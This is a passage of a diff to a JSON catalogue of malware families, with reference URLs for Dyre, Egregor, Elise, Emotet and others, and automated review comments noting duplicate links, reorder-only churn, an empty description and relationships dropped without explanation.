+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.secureworks.com/research/dyre-banking-trojan"
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html"
],
"synonyms": [
"Dyreza"
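Review bot: two pairs of near-duplicate references survive the Dyre reorder: `http://www.secureworks.com/research/threat-profiles/gold-blackburn` next to its `https://` form, and `https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/` next to the same article under `https://www.mcafee.com/blogs/...`. Since the hunk is already touching every one of these lines, normalising the scheme and dropping the duplicate would be cheap here.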
@@ -21564,8 +22930,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight",
- "https://content.fireeye.com/api/pdfproxy?id=86840",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
+ "https://content.fireeye.com/api/pdfproxy?id=86840"
],
"synonyms": [],
"type": []
@@ -21592,72 +22958,72 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
"https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
- "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
"https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
- "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
- "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
"https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
+ "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
+ "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/",
+ "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
+ "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
"https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf",
"https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.group-ib.com/blog/egregor",
- "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
- "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
- "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
- "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
- "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
"https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
- "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
- "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://twitter.com/redcanary/status/1334224861628039169",
- "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
"https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.group-ib.com/blog/egregor",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
+ "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
+ "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/"
],
"synonyms": [],
"type": []
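Review bot: this hunk rewrites nearly the whole Egregor `refs` array to change ordering only; every `+` URL also appears as a `-` URL and the hunk header is `-72 +72`. It also leaves duplicates in place: `https://cisoclub.ru/doc/...group-ib_ransomware_uncovered_2020-2021.pdf` beside its `web.archive.org` snapshot, `https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/` beside `https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf`, and the analyst1 PDF beside the analyst1 blog post of the same report. A stable sort in the generator would turn this into an empty hunk, and a dedupe pass would shrink the list.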
@@ -21678,6 +23044,19 @@
"uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
"value": "EHDevel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ekipa",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-macros-adapt-to-use-microsoft-publisher-to-push-ekipa-rat/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "791a0902-7541-444a-a75e-19be97545917",
+ "value": "Ekipa RAT"
+ },
{
"description": "The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.",
"meta": {
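Review bot: the new Ekipa RAT cluster ships with `"description": ""`. An empty string adds nothing for consumers of the galaxy and will render as a blank entry in the HTML; fill it with a short summary from the Malpedia page already cited in `refs` (`https://malpedia.caad.fkie.fraunhofer.de/details/win.ekipa`) or the Trustwave SpiderLabs post, or leave it out until one is available. The UUID, the two refs and the empty `synonyms`/`type` arrays are consistent with the surrounding clusters.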
@@ -21685,6 +23064,7 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-129A",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
@@ -21716,15 +23096,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c0ea7b89-d246-4eb7-8de4-b4e17e135051",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9",
"value": "Elirks"
},
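Review bot: the `related` entry pointing at `c0ea7b89-d246-4eb7-8de4-b4e17e135051` is removed from Elirks with nothing replacing it, so the `similar` relationship and its `almost-certain` estimative-language tag are lost to anyone consuming the galaxy. If the target cluster was deleted or merged, note it in the commit message; otherwise the link should stay.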
@@ -21733,16 +23104,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.elise",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-elgin",
- "https://www.joesecurity.org/blog/8409877569366580427",
- "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
- "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html"
+ "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-elgin",
+ "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html",
+ "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
+ "https://www.joesecurity.org/blog/8409877569366580427"
],
"synonyms": [
"EVILNEST"
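Review bot: the two Accenture URLs kept in the Elise `refs` differ only in `_w_` versus `__w__` in the path (`.../t20180127T003755Z_w_/...` and `.../t20180127T003755Z__w__/...`) and point at the same Dragonfish PDF. Since this hunk already rewrites the surrounding lines, drop one of them rather than reorder both.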
@@ -21770,11 +23141,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer",
- "https://attack.mitre.org/software/S0064",
- "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/",
"https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
"https://www.symantec.com/security-center/writeup/2015-122210-5724-99",
- "https://attack.mitre.org/groups/G0023"
+ "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/",
+ "https://attack.mitre.org/groups/G0023",
+ "https://attack.mitre.org/software/S0064"
],
"synonyms": [
"Elmost"
@@ -21789,25 +23160,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/",
- "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
"http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
+ "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
"https://www.macnica.net/file/security_report_20160613.pdf",
"https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a8395aae-1496-417d-98ee-3ecbcd9a94a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
"value": "Emdivi"
},
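Review bot: besides reordering the Trend Micro and Securelist refs, this hunk deletes the Emdivi `related` entry to `a8395aae-1496-417d-98ee-3ecbcd9a94a0`. Mixing a cosmetic reorder with a data-dropping change in one hunk makes the latter easy to miss in review; split the relationship removals (here, Elirks and DUSTMAN) into their own commit with a rationale.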
@@ -21829,292 +23191,316 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet",
- "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques",
- "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
- "https://blog.lumen.com/emotet-redux/",
- "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
- "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
- "https://www.youtube.com/watch?v=_mGMJFNJWSk",
- "https://feodotracker.abuse.ch/?filter=version_e",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
- "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
- "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
- "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
- "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://threatresearch.ext.hp.com/emotets-return-whats-different/",
- "https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
- "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
- "https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
- "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
- "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
- "https://twitter.com/ContiLeaks/status/1498614197202079745",
- "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
- "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
- "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams",
- "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
- "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
- "https://securelist.com/emotet-modules-and-recent-attacks/106290/",
- "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii",
- "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/",
- "https://d00rt.github.io/emotet_network_protocol/",
- "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/",
- "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
- "https://github.com/cecio/EMOTET-2020-Reversing",
- "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html",
- "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
- "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/",
- "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html",
- "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
- "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.zscaler.com/blogs/security-research/return-emotet-malware",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf",
- "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros",
- "https://securelist.com/the-chronicles-of-emotet/99660/",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection",
- "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/",
- "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/",
- "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
- "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
- "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
- "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates",
- "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html",
- "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet",
- "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
- "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
- "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
- "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
- "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware",
- "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://persianov.net/emotet-malware-analysis-part-1",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://twitter.com/eduardfir/status/1461856030292422659",
- "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
- "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
- "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break",
- "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/",
- "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
- "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
- "https://www.youtube.com/watch?v=_BLOmClsSpc",
- "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
- "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/",
- "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/",
- "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
- "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
